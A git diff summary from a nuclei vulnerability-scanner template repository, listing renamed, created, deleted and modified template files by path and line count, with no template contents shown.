.../Other/ws_ftp-server-web-transfer.yaml | 9 +- nuclei-templates/Other/ws_ftp-ssh-detect.yaml | 3 +- nuclei-templates/Other/wsdl-api-11632.yaml | 17 - nuclei-templates/Other/wsdl-api.yaml | 15 + .../Other/wso2-2019-0598-11635.yaml | 30 + .../Other/wso2-apimanager-detect-11639.yaml | 4 - .../Other/wso2-default-login.yaml | 15 +- .../Other/wso2-management-console-11645.yaml | 22 + .../Other/wso2-management-console.yaml | 19 - .../Other/wso2-products-detect.yaml | 6 +- .../Other/wuzhicms-sqli-11659.yaml | 23 + nuclei-templates/Other/wuzhicms-sqli.yaml | 23 - .../Other/x-content-type-options.yaml | 6 +- .../Other/x-forwarded-reflection.yaml | 18 +- nuclei-templates/Other/x-frame-options.yaml | 6 +- .../Other/x-recruiting-header.yaml | 13 +- nuclei-templates/Other/x-ui.yaml | 22 + .../Other/xampp-default-page-11662.yaml | 20 + .../Other/xampp-default-page-11663.yaml | 23 - .../Other/xampp-environment-variables.yaml | 6 +- ...{xdcms-sqli.yaml => xdcms-sqli-11666.yaml} | 0 .../Other/xds-amr-status-11669.yaml | 26 + nuclei-templates/Other/xds-amr-status.yaml | 30 - .../Other/xeams-admin-console.yaml | 15 +- nuclei-templates/Other/xenforo-detect.yaml | 5 +- ...ro-login.yaml => xenforo-login-11670.yaml} | 0 .../Other/xenmobile-login-11677.yaml | 22 - nuclei-templates/Other/xenmobile-login.yaml | 19 + .../Other/xenmobile-server-log4j.yaml | 43 +- nuclei-templates/Other/xenmobile_server.yaml | 20 + .../Other/xerox-d95-copier-webserver.yaml | 6 +- .../Other/xerox-efi-lfi-11682.yaml | 27 - .../Other/xerox-efi-lfi-11683.yaml | 33 + .../Other/xerox-phaser-7500dt-webserver.yaml | 6 +- .../Other/xerox-workcentre-detect.yaml | 59 +- .../Other/xerox7-default-login-11678.yaml | 46 + .../Other/xerox7-default-login.yaml | 47 - .../Other/xff-403-bypass-11684.yaml | 7 +- nuclei-templates/Other/xfinity-panel.yaml | 9 +- .../Other/xiaomi-wireless-router-login.yaml | 7 +- nuclei-templates/Other/xibocms-login.yaml | 9 +- .../Other/xlight-ftp-service-detect.yaml | 64 +- .../Other/xml-schema-detect-11691.yaml | 24 - nuclei-templates/Other/xml-schema-detect.yaml | 21 + .../Other/xmlrpc-pingback-ssrf-11687.yaml | 3 - .../Other/xnat-default-login.yaml | 5 +- nuclei-templates/Other/xnat-login.yaml | 9 +- nuclei-templates/Other/xnat.yaml | 20 + .../Other/xoops-installation-wizard.yaml | 11 +- ...webcam-11698.yaml => xp-webcam-11697.yaml} | 0 .../Other/xprober-service-11694.yaml | 17 + nuclei-templates/Other/xprober-service.yaml | 19 - .../Other/xss-deprecated-header.yaml | 9 +- nuclei-templates/Other/xss-fuzz.yaml | 83 +- nuclei-templates/Other/xss-oracle.yaml | 42 +- .../Other/xss-serialize-javascript.yaml | 12 +- nuclei-templates/Other/xsstest.yaml | 80 - nuclei-templates/Other/xui-weak-login.yaml | 10 +- nuclei-templates/Other/xvr-login-11704.yaml | 23 + nuclei-templates/Other/xvr-login.yaml | 20 - nuclei-templates/Other/xweb500-panel.yaml | 12 +- ...ct.yaml => xxljob-admin-detect-11708.yaml} | 0 .../Other/xxljob-default-login-11711.yaml | 44 - .../Other/xxljob-default-login-11714.yaml | 56 + .../Other/xxljob-panel-11716.yaml | 23 +- ...tect-11720.yaml => yapi-detect-11719.yaml} | 0 .../{yapi-rce.yaml => yapi-rce-11724.yaml} | 0 nuclei-templates/Other/yarn-lock-11728.yaml | 25 + nuclei-templates/Other/yarn-lock.yaml | 30 - .../Other/yarn-manager-exposure-11733.yaml | 19 - .../Other/yarn-manager-exposure.yaml | 17 + .../Other/yarn-resourcemanager-rce-11735.yaml | 25 - .../Other/yarn-resourcemanager-rce.yaml | 21 + nuclei-templates/Other/yellowfin-panel.yaml | 7 +- nuclei-templates/Other/yeswiki-detect.yaml | 8 +- nuclei-templates/Other/yeswiki-sql.yaml | 8 +- .../Other/yeswiki-stored-xss.yaml | 11 +- nuclei-templates/Other/yeswiki-xss.yaml | 13 +- nuclei-templates/Other/yeswiki.yaml | 20 + .../Other/yii-debugger-11738.yaml | 34 + nuclei-templates/Other/yii-debugger.yaml | 37 - nuclei-templates/Other/yii-error-page.yaml | 4 +- ...min-lfi.yaml => yishaadmin-lfi-11744.yaml} | 0 .../Other/yith-woocommerce-compare.yaml | 6 +- .../Other/yith-woocommerce-wishlist.yaml | 2 +- .../Other/yongyou-ICurrtype-sqli.yaml | 42 - nuclei-templates/Other/yongyou-jdbcread.yaml | 38 + nuclei-templates/Other/yongyou-rce.yaml | 4 - nuclei-templates/Other/yongyou-ssrf.yaml | 10 +- ...you-u8-RegisterServlet-sql-Injection.yaml} | 0 ...qli.yaml => yongyou-u8-oa-sqli-11747.yaml} | 0 .../Other/yonyou-nc-workflow.yaml | 3 +- nuclei-templates/Other/yonyou-u8-oa-sqli.yaml | 19 +- nuclei-templates/Other/yonyou-u8-sqli.yaml | 18 +- ..._ncchr_attachment_uploadchunk_upload.yaml} | 0 ...ass-panel.yaml => yopass-panel-11749.yaml} | 0 nuclei-templates/Other/youtube.yaml | 45 +- ...fileRead.yaml => yunxintong-fileread.yaml} | 0 .../Other/yzmcms-detect-11751.yaml | 23 - nuclei-templates/Other/yzmcms-detect.yaml | 19 + nuclei-templates/Other/yzmcms-panel.yaml | 13 +- .../Other/zabbix-dashboards-access.yaml | 58 +- .../Other/zabbix-default-credentials.yaml | 7 +- ...n-11762.yaml => zabbix-default-login.yaml} | 0 nuclei-templates/Other/zabbix-error.yaml | 4 - .../Other/zabbix-server-login.yaml | 4 +- nuclei-templates/Other/zap-api-detect.yaml | 8 +- nuclei-templates/Other/zapier-webhook.yaml | 5 +- .../Other/zblog-exposed-admin-panel.yaml | 14 +- nuclei-templates/Other/zblogphp-panel.yaml | 10 +- .../Other/zcms-v3-sqli-11775.yaml | 21 + nuclei-templates/Other/zcms-v3-sqli.yaml | 21 - .../Other/zebra-printer-detect.yaml | 5 +- .../Other/zend-server-test-page.yaml | 5 +- nuclei-templates/Other/zend-v1-xss.yaml | 6 +- ...enphoto-installation-sensitive-info-1.yaml | 34 + ...enphoto-installation-sensitive-info-2.yaml | 34 + ...enphoto-installation-sensitive-info-3.yaml | 34 + ...enphoto-installation-sensitive-info-4.yaml | 34 + .../zenphoto-installation-sensitive-info.yaml | 8 +- nuclei-templates/Other/zenphoto-setup.yaml | 8 +- nuclei-templates/Other/zenscrape-api-key.yaml | 7 +- nuclei-templates/Other/zenserp-api-key.yaml | 7 +- ...ct-11787.yaml => zentao-detect-11785.yaml} | 0 nuclei-templates/Other/zentao.yaml | 22 + nuclei-templates/Other/zentral-detection.yaml | 3 - nuclei-templates/Other/zentral-panel.yaml | 11 +- .../Other/zerof-webserver-detect.yaml | 6 +- nuclei-templates/Other/zeroshell-login.yaml | 2 +- .../Other/zhixiang-oa-msglog-sqli.yaml | 21 +- .../Other/zhiyuan-file-upload-11791.yaml | 29 - .../Other/zhiyuan-file-upload.yaml | 28 + .../Other/zhiyuan-oa-info-leak-11799.yaml | 22 + .../Other/zhiyuan-oa-info-leak.yaml | 26 - .../Other/zhiyuan-oa-session-leak.yaml | 8 +- ...aml => zhiyuan-oa-unauthorized-11806.yaml} | 0 nuclei-templates/Other/zimbra-detect.yaml | 6 +- .../Other/zimbra-preauth-ssrf-11811.yaml | 23 - .../Other/zimbra-preauth-ssrf.yaml | 28 + .../Other/zimbra-web-client-11814.yaml | 4 - nuclei-templates/Other/zimbra-web-login.yaml | 19 +- .../Other/zip-backup-files-11819.yaml | 62 - .../Other/zip-backup-files-11820.yaml | 64 + .../Other/zip-path-overwrite.yaml | 28 +- nuclei-templates/Other/zipkin-exposure.yaml | 2 +- .../Other/zm-system-log-detect-11833.yaml | 25 - .../Other/zm-system-log-detect-11834.yaml | 21 + .../Other/zmanda-default-login-11825.yaml | 36 + .../Other/zmanda-default-login.yaml | 39 - .../Other/zms-auth-bypass-11830.yaml | 36 - nuclei-templates/Other/zms-auth-bypass.yaml | 33 + nuclei-templates/Other/zms-sqli.yaml | 8 +- nuclei-templates/Other/zoneminder-login.yaml | 12 +- nuclei-templates/Other/zope-detect.yaml | 5 +- nuclei-templates/Other/zrypt-malware.yaml | 7 +- nuclei-templates/Other/zte-panel-11840.yaml | 24 + nuclei-templates/Other/zte-panel.yaml | 21 - nuclei-templates/Other/zuul-panel-11843.yaml | 27 + nuclei-templates/Other/zuul-panel.yaml | 33 - .../Other/zyxel-firewall-panel.yaml | 9 +- .../Other/zyxel-router-panel.yaml | 13 +- .../Other/zyxel-vmg1312b10d-login.yaml | 12 +- .../Other/zyxel-vsg1432b101-login.yaml | 8 +- nuclei-templates/Other/zzcms-xss.yaml | 10 +- nuclei-templates/Other/zzzcms-ssrf.yaml | 4 +- nuclei-templates/Other/zzzcms-xss.yaml | 4 +- 7520 files changed, 187532 insertions(+), 80486 deletions(-) rename nuclei-templates/CVE-2000/{cve-2000-0114.yaml => CVE-2000-0114.yaml} (100%) rename nuclei-templates/CVE-2001/{CVE-2001-1473.yaml => cve-2001-1473.yaml} (100%) create mode 100644 nuclei-templates/CVE-2005/CVE-2005-2428.yaml delete mode 100644 nuclei-templates/CVE-2005/cve-2005-2428.yaml rename nuclei-templates/CVE-2005/{CVE-2005-4385.yaml => cve-2005-4385.yaml} (100%) rename nuclei-templates/CVE-2006/{cve-2006-1681.yaml => CVE-2006-1681.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-0885.yaml delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-4556.yaml delete mode 100644 nuclei-templates/CVE-2007/CVE-2007-5728.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-0885.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-4556.yaml create mode 100644 nuclei-templates/CVE-2007/cve-2007-5728.yaml rename nuclei-templates/CVE-2008/{cve-2008-2398.yaml => CVE-2008-2398.yaml} (100%) rename nuclei-templates/CVE-2008/{cve-2008-2650.yaml => CVE-2008-2650.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-6172.yaml => cve-2008-6172.yaml} (100%) rename nuclei-templates/CVE-2008/{CVE-2008-6222.yaml => cve-2008-6222.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-1496.yaml => CVE-2009-1496.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-2100.yaml => CVE-2009-2100.yaml} (100%) rename nuclei-templates/CVE-2009/{cve-2009-3318.yaml => CVE-2009-3318.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-2015.yaml => cve-2009-2015.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-4679.yaml => cve-2009-4679.yaml} (100%) rename nuclei-templates/CVE-2009/{CVE-2009-5020.yaml => cve-2009-5020.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0759.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1081.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1302.yaml rename nuclei-templates/CVE-2010/{cve-2010-1305.yaml => CVE-2010-1305.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1306.yaml => CVE-2010-1306.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1313.yaml => CVE-2010-1313.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1314.yaml => CVE-2010-1314.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1475.yaml => CVE-2010-1475.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1495.yaml => CVE-2010-1495.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1532.yaml rename nuclei-templates/CVE-2010/{cve-2010-1535.yaml => CVE-2010-1535.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1602.yaml => CVE-2010-1602.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1603.yaml => CVE-2010-1603.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1715.yaml => CVE-2010-1715.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1722.yaml => CVE-2010-1722.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1723.yaml rename nuclei-templates/CVE-2010/{cve-2010-1870.yaml => CVE-2010-1870.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1954.yaml => CVE-2010-1954.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1956.yaml => CVE-2010-1956.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1981.yaml => CVE-2010-1981.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1982.yaml => CVE-2010-1982.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2033.yaml => CVE-2010-2033.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2035.yaml => CVE-2010-2035.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2259.yaml rename nuclei-templates/CVE-2010/{cve-2010-2307.yaml => CVE-2010-2307.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2680.yaml => CVE-2010-2680.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2857.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2918.yaml rename nuclei-templates/CVE-2010/{cve-2010-2920.yaml => CVE-2010-2920.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-4617.yaml => CVE-2010-4617.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-4977.yaml rename nuclei-templates/CVE-2010/{cve-2010-5278.yaml => CVE-2010-5278.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-0157.yaml => cve-2010-0157.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-0759.yaml rename nuclei-templates/CVE-2010/{CVE-2010-0942.yaml => cve-2010-0942.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-0944.yaml => cve-2010-0944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1081.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1217.yaml => cve-2010-1217.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1302.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1352.yaml => cve-2010-1352.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1353.yaml => cve-2010-1353.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1354.yaml => cve-2010-1354.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1472.yaml => cve-2010-1472.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1473.yaml => cve-2010-1473.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1491.yaml => cve-2010-1491.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1531.yaml => cve-2010-1531.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1532.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1601.yaml => cve-2010-1601.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1657.yaml => cve-2010-1657.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-1718.yaml => cve-2010-1718.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1723.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1979.yaml => cve-2010-1979.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2036.yaml => cve-2010-2036.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2050.yaml => cve-2010-2050.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-2128.yaml => cve-2010-2128.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2259.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2857.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2918.yaml rename nuclei-templates/CVE-2010/{CVE-2010-3203.yaml => cve-2010-3203.yaml} (100%) rename nuclei-templates/CVE-2010/{CVE-2010-4239.yaml => cve-2010-4239.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-4977.yaml delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-0049.yaml rename nuclei-templates/CVE-2011/{cve-2011-1669.yaml => CVE-2011-1669.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4336.yaml delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4926.yaml rename nuclei-templates/CVE-2011/{cve-2011-5107.yaml => CVE-2011-5107.yaml} (100%) rename nuclei-templates/CVE-2011/{cve-2011-5179.yaml => CVE-2011-5179.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-5181.yaml rename nuclei-templates/CVE-2011/{cve-2011-5265.yaml => CVE-2011-5265.yaml} (100%) create mode 100644 nuclei-templates/CVE-2011/cve-2011-0049.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-4336.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-4926.yaml create mode 100644 nuclei-templates/CVE-2011/cve-2011-5181.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0991.yaml create mode 100644 nuclei-templates/CVE-2012/CVE-2012-2122.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4768.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4940.yaml rename nuclei-templates/CVE-2012/{CVE-2012-0901.yaml => cve-2012-0901.yaml} (100%) rename nuclei-templates/CVE-2012/{CVE-2012-0981.yaml => cve-2012-0981.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-0991.yaml rename nuclei-templates/CVE-2012/{CVE-2012-3153.yaml => cve-2012-3153.yaml} (100%) mode change 100644 => 100755 create mode 100644 nuclei-templates/CVE-2012/cve-2012-4768.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-4940.yaml rename nuclei-templates/CVE-2012/{CVE-2012-5913.yaml => cve-2012-5913.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-1965.yaml delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2248.yaml rename nuclei-templates/CVE-2013/{cve-2013-2251.yaml => CVE-2013-2251.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2287.yaml rename nuclei-templates/CVE-2013/{cve-2013-3827.yaml => CVE-2013-3827.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-4117.yaml create mode 100644 nuclei-templates/CVE-2013/CVE-2013-6281.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-1965.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-2248.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-2287.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-4117.yaml rename nuclei-templates/CVE-2013/{CVE-2013-5528.yaml => cve-2013-5528.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/cve-2013-6281.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-1203.yaml rename nuclei-templates/CVE-2014/{cve-2014-2323.yaml => CVE-2014-2323.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4536.yaml rename nuclei-templates/CVE-2014/{cve-2014-4550.yaml => CVE-2014-4550.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4561.yaml => CVE-2014-4561.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4592.yaml => CVE-2014-4592.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4940.yaml => CVE-2014-4940.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-5368.yaml => CVE-2014-5368.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-6271.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9094.yaml rename nuclei-templates/CVE-2014/{cve-2014-9444.yaml => CVE-2014-9444.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9606.yaml => CVE-2014-9606.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9607.yaml => CVE-2014-9607.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9608.yaml => CVE-2014-9608.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9617.yaml => CVE-2014-9617.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-9618.yaml => CVE-2014-9618.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-1203.yaml rename nuclei-templates/CVE-2014/{CVE-2014-2383.yaml => cve-2014-2383.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-2908.yaml => cve-2014-2908.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-3704.yaml => cve-2014-3704.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-4513.yaml => cve-2014-4513.yaml} (100%) rename nuclei-templates/CVE-2014/{CVE-2014-4535.yaml => cve-2014-4535.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-4536.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-6271.yaml rename nuclei-templates/CVE-2014/{CVE-2014-8682.yaml => cve-2014-8682.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-9094.yaml rename nuclei-templates/CVE-2014/{CVE-2014-9615.yaml => cve-2014-9615.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-1880.yaml => CVE-2015-1880.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/CVE-2015-2794.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3224.yaml rename nuclei-templates/CVE-2015/{cve-2015-4414.yaml => CVE-2015-4414.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/CVE-2015-4666.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-4668.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-5354.yaml rename nuclei-templates/CVE-2015/{cve-2015-5688.yaml => CVE-2015-5688.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-6477.yaml => CVE-2015-6477.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-6544.yaml rename nuclei-templates/CVE-2015/{cve-2015-7377.yaml => CVE-2015-7377.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-7823.yaml => CVE-2015-7823.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-9480.yaml => CVE-2015-9480.yaml} (100%) rename nuclei-templates/CVE-2015/{CVE-2015-2166.yaml => cve-2015-2166.yaml} (100%) rename nuclei-templates/CVE-2015/{CVE-2015-2807.yaml => cve-2015-2807.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/cve-2015-3224.yaml rename nuclei-templates/CVE-2015/{CVE-2015-3306.yaml => cve-2015-3306.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/cve-2015-4666.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-4668.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-5354.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-6544.yaml rename nuclei-templates/CVE-2015/{CVE-2015-7450.yaml => cve-2015-7450.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000126.yaml => CVE-2016-1000126.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000127.yaml => CVE-2016-1000127.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000128.yaml => CVE-2016-1000128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000133.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000134.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000135.yaml => CVE-2016-1000135.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000138.yaml => CVE-2016-1000138.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000141.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000142.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000148.yaml => CVE-2016-1000148.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000149.yaml => CVE-2016-1000149.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-10033.yaml => CVE-2016-10033.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-10960.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1555.yaml rename nuclei-templates/CVE-2016/{cve-2016-2004.yaml => CVE-2016-2004.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3088.yaml => CVE-2016-3088.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-4975.yaml => CVE-2016-4975.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-6277.yaml rename nuclei-templates/CVE-2016/{CVE-2016-0957.yaml => cve-2016-0957.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-1000129.yaml => cve-2016-1000129.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-1000132.yaml => cve-2016-1000132.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000133.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000134.yaml rename nuclei-templates/CVE-2016/{CVE-2016-1000139.yaml => cve-2016-1000139.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000141.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000142.yaml rename nuclei-templates/CVE-2016/{CVE-2016-1000153.yaml => cve-2016-1000153.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-10924.yaml => cve-2016-10924.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-10960.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1555.yaml rename nuclei-templates/CVE-2016/{CVE-2016-2389.yaml => cve-2016-2389.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-3081.yaml => cve-2016-3081.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-4977.yaml => cve-2016-4977.yaml} (100%) rename nuclei-templates/CVE-2016/{CVE-2016-5649.yaml => cve-2016-5649.yaml} (100%) create mode 100644 nuclei-templates/CVE-2016/cve-2016-6277.yaml rename nuclei-templates/CVE-2016/{CVE-2016-8527.yaml => cve-2016-8527.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-11512.yaml rename nuclei-templates/CVE-2017/{cve-2017-11610.yaml => CVE-2017-11610.yaml} (100%) mode change 100755 => 100644 nuclei-templates/CVE-2017/CVE-2017-12149.yaml rename nuclei-templates/CVE-2017/{cve-2017-12611.yaml => CVE-2017-12611.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12794.yaml => CVE-2017-12794.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-14135.yaml => CVE-2017-14135.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-15647.yaml => CVE-2017-15647.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-15944.yaml => CVE-2017-15944.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/CVE-2017-16894.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-17736.yaml rename nuclei-templates/CVE-2017/{cve-2017-18024.yaml => CVE-2017-18024.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-18638.yaml => CVE-2017-18638.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-6361.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-7504.yaml create mode 100644 nuclei-templates/CVE-2017/CVE-2017-8229.yaml rename nuclei-templates/CVE-2017/{cve-2017-9506.yaml => CVE-2017-9506.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-1000027.yaml => cve-2017-1000027.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/cve-2017-11512.yaml rename nuclei-templates/CVE-2017/{CVE-2017-11586.yaml => cve-2017-11586.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-12544.yaml => cve-2017-12544.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-12635.yaml => cve-2017-12635.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-14849.yaml => cve-2017-14849.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-18536.yaml => cve-2017-18536.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-3528.yaml => cve-2017-3528.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-5521.yaml => cve-2017-5521.yaml} (100%) rename nuclei-templates/CVE-2017/{CVE-2017-5982.yaml => cve-2017-5982.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-6361.yaml rename nuclei-templates/CVE-2017/{CVE-2017-9288.yaml => cve-2017-9288.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-0296.yaml => CVE-2018-0296.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-1000129.yaml => CVE-2018-1000129.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000671.yaml rename nuclei-templates/CVE-2018/{cve-2018-1000861.yaml => CVE-2018-1000861.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10093.yaml => CVE-2018-10093.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10095.yaml => CVE-2018-10095.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-11409.yaml => CVE-2018-11409.yaml} (100%) delete mode 100644 